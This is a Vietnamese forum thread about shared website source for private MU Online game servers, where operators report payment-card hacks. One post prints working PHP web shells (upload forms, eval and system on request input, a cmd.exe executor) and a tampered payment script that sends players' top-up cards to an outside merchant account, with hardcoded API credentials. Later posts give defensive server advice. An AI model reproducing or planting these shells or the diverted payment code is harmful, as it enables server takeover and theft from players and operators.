PDA

View Full Version : [MU] Share Dweb Full ver mới nhất



soncuti
16-02-17, 09:56 AM
bộ này nguyên vẹn cách đây nửa tháng mình mua của dweb với giá 600k
Lưu ý.


Nếu các bạn chưa biết tạo lic thì xài luôn lic đi kèm mình add sẵn rồi còn biết thì tự tạo lại nhé.
vì lí do chưa ra mu mới nên mình cũng chưa sài tới bộ này.mua để nghịch thôi


link full : <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

do bây giờ Dweb không cung cấp query nữa và chỉ cung cấp DB của các sv chạy sẵn query nên các bạn dùng tạm query của topic eck chạy thử.lỗi thì cứ pm tại đây ta hoàn thiện nốt.

Link query : <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

Thanks DWEB, hoangtu_eck94 (<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>)

coolnight
16-02-17, 11:12 AM
Chưa cần sử dụng đến... nhưng sẽ sử dụng ..... ^^ thank's bác

heroviet2301
16-02-17, 06:47 PM
Bộ này kiểm tra qua thì trả có cái chức năng gì khác bộ Dweb kia cả.

hoangtu_eck94
17-02-17, 10:54 AM
:)))) chưa xem nhưng chắc bản mới cũng chả thêm cái gì =))))))

lequangvu
17-02-17, 04:05 PM
Có thế bản này giống với bản của eck share, eck check qua xem :D

cảm ơn chủ thớt vì sự nhiệt tình chia sẻ

hoangtu_eck94
17-02-17, 04:12 PM
Có thế bản này giống với bản của eck share, eck check qua xem :D

cảm ơn chủ thớt vì sự nhiệt tình chia sẻklq Vũ mở hộ mình cái chat box. chiều chém gió bán source bị band mất rồi :))))))))

Domino9990
17-02-17, 04:51 PM
ngửi ngủi ngửi.mũi đâu?? ta phải ngửi xem nó để lại dấu vết thế nào.
xoáy.
1 chạy phần mềm kiểm tra ip kết nối vs vps
2 chạy phần mềm kiểm tra file bị thay đổi nếu có thì thông báo ngay
3 lưu log packet của xampp

lequangvu
17-02-17, 06:59 PM
ngửi ngủi ngửi.mũi đâu?? ta phải ngửi xem nó để lại dấu vết thế nào.
xoáy.
1 chạy phần mềm kiểm tra ip kết nối vs vps
2 chạy phần mềm kiểm tra file bị thay đổi nếu có thì thông báo ngay
3 lưu log packet của xampp

Bị ở trên hosting cơ Đô ơi :D, giờ nó chơi ngầm như vậy mới ghê chứ, nhưng dù sao mình đã khắc phục cho 1 khách hàng ok rồi, giờ đang chờ xem :P

mother
17-02-17, 07:54 PM
Bị ở trên hosting cơ Đô ơi :D, giờ nó chơi ngầm như vậy mới ghê chứ, nhưng dù sao mình đã khắc phục cho 1 khách hàng ok rồi, giờ đang chờ xem :P

bác có thể miêu tả cách thức cho ae được k.8->

alobabyday
17-02-17, 08:03 PM
bác có thể miêu tả cách thức cho ae được k.8->

Trứoc em cũng bị. member nó nạp thẻ gcoin vào bình thường mỗi tội ko vào tk baokim , em phát hiện ra up load toàn bộ code ở trên máy tính lại lên server,hosting => hôm sau nó vào vps xáo sạch sql 2000 luôn?
:)) bó tay 8->

lequangvu
17-02-17, 08:13 PM
Mình gợi ý cho các bạn chút thế này nhé

1- code file shell của nó đây



<?php
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
{
error_reporting(0);
$docr = $_SERVER["DOCUMENT_ROOT"];
echo <<<HTML
<p>
<p>File Upload</b></p>
</p>
<table>
<form enctype="multipart/form-data" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<td><font size="1">Your File : </font> </td>
<td>
<input size="48" name="file" type="file"></td>
</tr>
<tr>
<td><font size="1">Upload Dir : </font> </td>
<td>
<input size="48" value="$docr/" name="path" type="text">
<input type="submit" value="Upload"></td>
$tend
HTML;
if (isset($_POST["path"])){
$uploadfile = $_POST["path"].$_FILES["file"]["name"];
if ($_POST["path"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)) {
echo "File uploaded to : $uploadfilen";
echo "- Size : " .$_FILES["file"]["size"]. "n";
} else {
print "Error Upload File :n";
}
}
}
?>
<?php
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
{
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
if($files["name"] != ''){
$fullpath = $_REQUEST["path"].$files["name"];
if(move_uploaded_file($files['tmp_name'],$fullpath)){
echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
}
}
exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');
}
eval($_REQUEST['dct']);
?>
<?php
eval($_REQUEST['dct']);
?>
<?php $cmd = <<<EOD
cmd
EOD;

if(isset($_REQUEST[$cmd])) {
system($_REQUEST[$cmd]); } ?>

<?php
if($_GET['id']=='login')
{
echo '<form method="POST" enctype="multipart/form-data" action="?id=login">
<input type="file" name="file_upload" size="20" id="file">
<input type="submit" name="gui" value="Up" >
</form>';if (isset($_POST['gui'])){
move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);
}
}
?>

<?php
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
{
echo '<meta <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>"Content-Type" content="text/html; charset=utf-8" />';
echo '<form method="post">
Command:<input type="text" name="id" value=""/></br>
<button type="submit">Execute</button>
</form>';
$command=$_POST['id'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec('cmd.exe /c '.$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
}
?>



2- code file nạp thẻ ví dụ là gate.php



<?php
/**
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
*/

if (!defined('NetVWEB')) die("Ban khong co quyen truy cap he thong");
if ($Use_CardGATE != 1) {
echo "<center>Chức năng không có hoặc không được sử dụng</center>";
}
else {
include('config/config_napthe_gate.php');

include('config/config_napthe.php');
if ( $khuyenmai_gate > 0) {
$menhgia10000k = $menhgia10000*(1+($khuyenmai_gate/100));
$menhgia20000k = $menhgia20000*(1+($khuyenmai_gate/100));
$menhgia30000k = $menhgia30000*(1+($khuyenmai_gate/100));
$menhgia50000k = $menhgia50000*(1+($khuyenmai_gate/100));
$menhgia100000k = $menhgia100000*(1+($khuyenmai_gate/100));
$menhgia200000k = $menhgia200000*(1+($khuyenmai_gate/100));
$menhgia300000k = $menhgia300000*(1+($khuyenmai_gate/100));
$menhgia500000k = $menhgia500000*(1+($khuyenmai_gate/100));
}
if (isset($_POST['action']))
{
$action = $_POST['action'];
if ($action == 'vpoint_gate')
{
$cardtype = "GATE";
$menhgia = $_POST['menhgia'];
$card_num = $_POST['card_num'];
$card_serial = $_POST['card_serial'];
$taikhoan=$_SESSION['mu_username'];
$url = '<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>';
if( $sendsv === false ) { $error = "Tốc độ xử lý của bạn quá nhanh, vui lòng chờ vài giây rồi tiếp tục thực hiện."; }
elseif(empty($menhgia))
{
$error = "Chưa chọn mệnh giá thẻ GATE";
}
elseif (preg_match("/[^0-9$]/", $menhgia))
{
$error = "<font size='4' color='red'>Dữ liệu lỗi - Mệnh giá chỉ được sử dụng số (1-9).</font>";
}
elseif (empty($card_num)) {
$error = "Chưa điền Mã thẻ GATE";
}
elseif (preg_match("/[^0-9$]/", $card_num))
{
$error = "<font size='2' color='red'>Dữ liệu lỗi : $card_num . Chỉ được sử dụng số (1-9).</font>";
}
elseif (empty($card_serial)) {
$error = "Chưa điền Serial thẻ GATE";
}
elseif (preg_match("/[^a-zA-Z0-9$]/", $card_serial))
{
$error = "<font size='2' color='red'>Dữ liệu lỗi : $card_serial . Serial Chỉ được sử dụng chu a-z, A-Z và số (1-9).</font>";
}
else {
if($cardtype=='MobiPhone'){$mang = "MOBI";}
elseif($cardtype=='Viettel'){$mang = "VIETEL";}
elseif($cardtype=='GATE'){$mang = "GATE";}
elseif($cardtype=='VinaPhone'){$mang = "VINA";}
else $cardtype ="VinaPhone";
$bk = '<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>';
$merchant_id = '18343';
$api_username = '12330238230';
$api_password = '12330238230987stdyfAsd';
$transaction_id = time();
$secure_code = '5f96b57ac4114f5e';

$arrayPost = array(
'merchant_id'=>$merchant_id,
'api_username'=>$api_username,
'api_password'=>$api_password,
'transaction_id'=>$transaction_id,
'card_id'=>$mang,
'pin_field'=>$card_num,
'seri_field'=>$card_serial,
'algo_mode'=>'hmac'
);

ksort($arrayPost);
$data_sign = hash_hmac('SHA1',implode('',$arrayPost),$secure_co de);
$arrayPost['data_sign'] = $data_sign;
$curl = curl_init($bk);
curl_setopt_array($curl, array(
CURLOPT_POST=>true,
CURLOPT_HEADER=>false,
CURLINFO_HEADER_OUT=>true,
CURLOPT_TIMEOUT=>30,
CURLOPT_RETURNTRANSFER=>true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>>CURLAUTH_DIGEST|CURLAUTH_BASIC,
CURLOPT_USERPWD=>CORE_API_<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>':'.CORE_API_<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
CURLOPT_POSTFIELDS=>$arrayPost
));
$data = curl_exec($curl);
$status = curl_getinfo($curl, CURLINFO_<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>);
$result = json_decode($data,true);
if($status==200){
$amount = $result['amount'];
switch ($amount) {
case 10000: $xu = $menhgia10000k; break;
case 20000: $xu = $menhgia20000k; break;
case 30000: $xu = $menhgia20000k; break;
case 50000: $xu= $menhgia50000k; break;
case 100000: $xu = $menhgia100000k; break;
case 200000: $xu = $menhgia200000k; break;
case 300000: $xu = $menhgia200000k; break;
case 500000: $xu = $menhgia500000k; break;
case 1000000: $xu = $menhgia1000000k; break;

}
$fields = array(
//'customerid' => urlencode($_POST['customerid']),
'submit' => urlencode('Submit'),
'datatype' => urlencode('gcoin'),
'acc' => urlencode($taikhoan),
'plusminus' => urlencode('0'),
'value' => urlencode($xu),
'username' => urlencode('admin'),
//'useradmin' => urlencode('admin')
);
//url-ify the data for the POST
foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
rtrim($fields_string, '&');
//open connection
$ch = curl_init();
//set the url, number of POST vars, POST data
curl_setopt($ch, CURLOPT_<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> array("X-Requested-With: XML<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>"));
curl_setopt($ch,CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_POST, count($fields));
curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
//execute post
$resultkq = curl_exec($ch);
//close connection
curl_close($ch);
$notice = "Thông tin thẻ: Thẻ dúng. Mệnh giá: $amount VNÐ.";

//$notice = "Thông tin thẻ: Thẻ dúng. Mệnh giá: $amount VNÐ.";

} else{
$error = $result['errorMessage'];
}
}
}
}

$menhgia10000_km = 0;
$menhgia20000_km = 0;
$menhgia30000_km = 0;
$menhgia50000_km = 0;
$menhgia100000_km = 0;
$menhgia200000_km = 0;
$menhgia300000_km = 0;
$menhgia500000_km = 0;

//Gcoin khi nạp thẻ GATE nhiều hơn các thẻ khác
if ( $khuyenmai_gate > 0) {
$menhgia10000 = $menhgia10000*(1+($khuyenmai_gate/100));
$menhgia20000 = $menhgia20000*(1+($khuyenmai_gate/100));
$menhgia30000 = $menhgia30000*(1+($khuyenmai_gate/100));
$menhgia50000 = $menhgia50000*(1+($khuyenmai_gate/100));
$menhgia100000 = $menhgia100000*(1+($khuyenmai_gate/100));
$menhgia200000 = $menhgia200000*(1+($khuyenmai_gate/100));
$menhgia300000 = $menhgia300000*(1+($khuyenmai_gate/100));
$menhgia500000 = $menhgia500000*(1+($khuyenmai_gate/100));
}

//Khuyen mai chung
if ($khuyenmai == 1 ) {
$menhgia10000_km = $menhgia10000*($khuyenmai_phantram/100);
$menhgia20000_km = $menhgia20000*($khuyenmai_phantram/100);
$menhgia30000_km = $menhgia30000*($khuyenmai_phantram/100);
$menhgia50000_km = $menhgia50000*($khuyenmai_phantram/100);
$menhgia100000_km = $menhgia100000*($khuyenmai_phantram/100);
$menhgia200000_km = $menhgia200000*($khuyenmai_phantram/100);
$menhgia300000_km = $menhgia300000*($khuyenmai_phantram/100);
$menhgia500000_km = $menhgia500000*($khuyenmai_phantram/100);
}

$page_template = "templates/napthe/gate.tpl";
}
?>


Như vậy là các bạn biết phải làm thế nào rồi chứ?

Chúc may mắn thành công!

cuocdoisp
17-02-17, 08:16 PM
phong trào hack thẻ lại tái diễn à :)

heroviet2301
17-02-17, 08:18 PM
Cùng của một thằng mà nó đang hack các Mu hiện nay, giờ Mu nào cứ open là nó soi xem có hack được không, rip mấy bác ít kinh nghiệm, VPS tôi cũng vừa hết hạn tính méo gia hạn nữa, nhưng tình trạng này lại phải cắn răng gia hạn để tránh bị hack thẻ thôi T_T

Có cao thủ nó truy cập được cả vào web Admin cho dù máy chủ cấm port 80 chỉ cho IP quan trọng truy cập, tôi bị hack cả như này nữa nhé, nhưng không tiện tiết lộ cách nó làm chỉ đơn giản source bị share ra nên nó tìm được nhiều lỗ hổng bảo mật để xâm nhập.

lequangvu
18-02-17, 08:31 AM
Cùng của một thằng mà nó đang hack các Mu hiện nay, giờ Mu nào cứ open là nó soi xem có hack được không, rip mấy bác ít kinh nghiệm, VPS tôi cũng vừa hết hạn tính méo gia hạn nữa, nhưng tình trạng này lại phải cắn răng gia hạn để tránh bị hack thẻ thôi T_T

Có cao thủ nó truy cập được cả vào web Admin cho dù máy chủ cấm port 80 chỉ cho IP quan trọng truy cập, tôi bị hack cả như này nữa nhé, nhưng không tiện tiết lộ cách nó làm chỉ đơn giản source bị share ra nên nó tìm được nhiều lỗ hổng bảo mật để xâm nhập.

Nếu bị kiểu này thì nó chiến thông qua hosting của bạn hoặc là bạn không cấu hình lọc ip bằng firewall thì mới bị, disable hết port không liên quan, đổi port remote ........ có nhiều cách để xử lý bạn ạ

Domino9990
18-02-17, 08:43 AM
đang lang thang ngoài đường ráng đăng nhập để thank cậu hehe.

Domino9990
18-02-17, 08:52 AM
Cùng của một thằng mà nó đang hack các Mu hiện nay, giờ Mu nào cứ open là nó soi xem có hack được không, rip mấy bác ít kinh nghiệm, VPS tôi cũng vừa hết hạn tính méo gia hạn nữa, nhưng tình trạng này lại phải cắn răng gia hạn để tránh bị hack thẻ thôi T_T

Có cao thủ nó truy cập được cả vào web Admin cho dù máy chủ cấm port 80 chỉ cho IP quan trọng truy cập, tôi bị hack cả như này nữa nhé, nhưng không tiện tiết lộ cách nó làm chỉ đơn giản source bị share ra nên nó tìm được nhiều lỗ hổng bảo mật để xâm nhập.

herroviet search exploit remote code excution aibitary code là thấy xampp bị biến thành 1 cái teamviewer có khác gì nó remote trực tiếp vào vps đâu. chỉ là
1. nó có phải trẻ trâu hay không
2. là nó chưa thích show hàng ê tao vừa hack chiếm quyền vps mày nè.
3. nó đang cài vps thành zoombie chứ không thèm ngó ngàng đến thẻ của herro luôn đấy.
thực ra đối vs domino còn gặp nhiều vụ ghê gớm lắm ngay cả gameserver cũng có thể bị biến thành teamviewer kể cả thông qua proxy đấy. (nó gửi gói tin lên gameserver bảo chụp hình thì chụp bảo sửa file thì sửa bảo làm gì thì làm nấy. để có dịp domino làm cái demo sơ sơ cho ace hiểu)
lời khuyên
nếu ở mức độ nghiêm túc với máy chủ ai cũng nên nghĩ đến việc giám sát máy chủ của mình (dùng các công cụ giám sát truy cập, ghi log packets, như zabix, dialog , hirent firwall , và xem log trên máy chủ).
dĩ nhiên chỉ hạn chế thôi chứ bản thân window server cũng tìm ẩn rất nhiều exploit chết người ví dụ như ms-1020 thông qua RPC(cái remote desktop server ) chứ đừng nói đến các cái khác

soncuti
18-02-17, 10:19 AM
$bk = '<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>';
$merchant_id = '18343';
$api_username = '12330238230';
$api_password = '12330238230987stdyfAsd';
$transaction_id = time();
$secure_code = '5f96b57ac4114f5e';
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

alobabyday
18-02-17, 10:32 AM
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

hỏi nhân viên là ra mà bạn. không hỏi mấy cái thẻ nạp vào tài khoản bảo kim nào là được

soncuti
18-02-17, 10:45 AM
hỏi nhân viên là ra mà bạn. không hỏi mấy cái thẻ nạp vào tài khoản bảo kim nào là được

not disclose information :-&:-&:-&:-&:-&